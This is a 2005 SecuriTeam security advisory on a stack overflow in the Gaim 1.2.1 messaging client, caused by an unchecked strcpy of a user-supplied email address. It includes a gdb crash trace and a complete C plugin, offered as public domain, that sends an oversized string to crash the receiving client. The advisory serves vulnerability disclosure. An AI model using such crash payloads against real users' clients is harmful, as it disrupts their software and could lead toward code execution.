[EXPL] Gaim Stack Overflow (PoC)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Gaim Stack Overflow (PoC)
------------------------------------------------------------------------


SUMMARY

" <http://gaim.sourceforge.net/> Gaim is a multi-protocol instant 
messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is 
compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, 
Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."

A stack overflow vulnerability exists in Gaim, exploiting this 
vulnerability can lead to denial of service or, potentially, arbitrary 
code execution.

DETAILS

Vulnerable Systems:
 * Gaim version 1.2.1

Ron was looking at the stack overflow reported in Gaim 1.2.1. It's was 
actually pretty trivial to find. The line that contains it looks like 
this:
strcpy(url_buf, gurl_buf->str);
url_buf is a 8192-byte buffer, and gurl_buf->str is an email address that 
is being displayed (user controlled).

The difficulty in writing a real exploit is that the input is sanitized, 
so any character over 128, as well as ' ', ',', '\n', '<', and others are 
stripped away. This doesn't leave much to play with, although it would be 
possible to write an exploit under these conditions.

Another difficulty is that most chat protocols limit you to a reasonable 
message size, and 8192 is typically well above that size. So even if you 
could successfully create an exploit, you would still have to do it on a 
chat protocol that allows very long messages. The final difficulty is that 
you also process the URL locally, when you send it, but that's not really 
a big deal. It would be trivial to filter it out in a plugin to make sure 
you don't crash yourself.

For this example, Ron just threw together a quick plugin (based on an old 
plugin He wrote, which is why it's such a mess) which sends a 
10002-character email address when the user types "/vuln". Gaim crashes at 
the address 0x41414141.

(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()

Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow 
vulnerability
// when processing email addresses. What this basically does is segfault 
you when you
// do a /vuln command in a conversation, and, if you're using a protocol 
that allows
// a 10002-character message to go through, also segfaults the person you 
sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 
'A's, and
// the return address of the function ends up at 0x41414141. That's no 
good for
// anybody.
//
// This code should be considered public domain, and is freely 
modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile 
vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding 
vulnerability."

static GaimCmdId cmd;


char *code = "A@AAAA...(A*8192)...AAAAA";

gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar 
**error, void *data)
{
 gaim_conv_im_send(GAIM_CONV_IM(conv), code);

 return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
 cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM, 
NULL, (GaimCmdFunc)go, "/vuln", NULL);
 
 return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
 gaim_cmd_unregister (cmd);

 return TRUE;
}

static GaimPluginInfo info =
{
 GAIM_PLUGIN_MAGIC,
 GAIM_MAJOR_VERSION,
 GAIM_MINOR_VERSION,
 GAIM_PLUGIN_STANDARD, /**< type */
 NULL, /**< ui_requirement */
 0, /**< flags */
 NULL, /**< dependencies */
 GAIM_PRIORITY_DEFAULT, /**< priority */
 NULL, /**< id */
 N_("1.2.1 Email Overflow Demo"), /**< name */
 VERSION, /**< version */
         /** summary */
 N_(""),
         /** description */
 N_(""),
 "Ron <iago@valhallalegends.com>", /**< author */
 "", /**< homepage */

 plugin_load, /**< load */
 plugin_unload, /**< unload */
 NULL, /**< destroy */

 NULL, /**< ui_info */
 NULL, /**< extra_info */
 NULL,
 NULL
};


static void init_plugin(GaimPlugin *plugin)
{
}

GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)


ADDITIONAL INFORMATION

The information has been provided by  <mailto:iago@valhallalegends.com> 
Ron.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.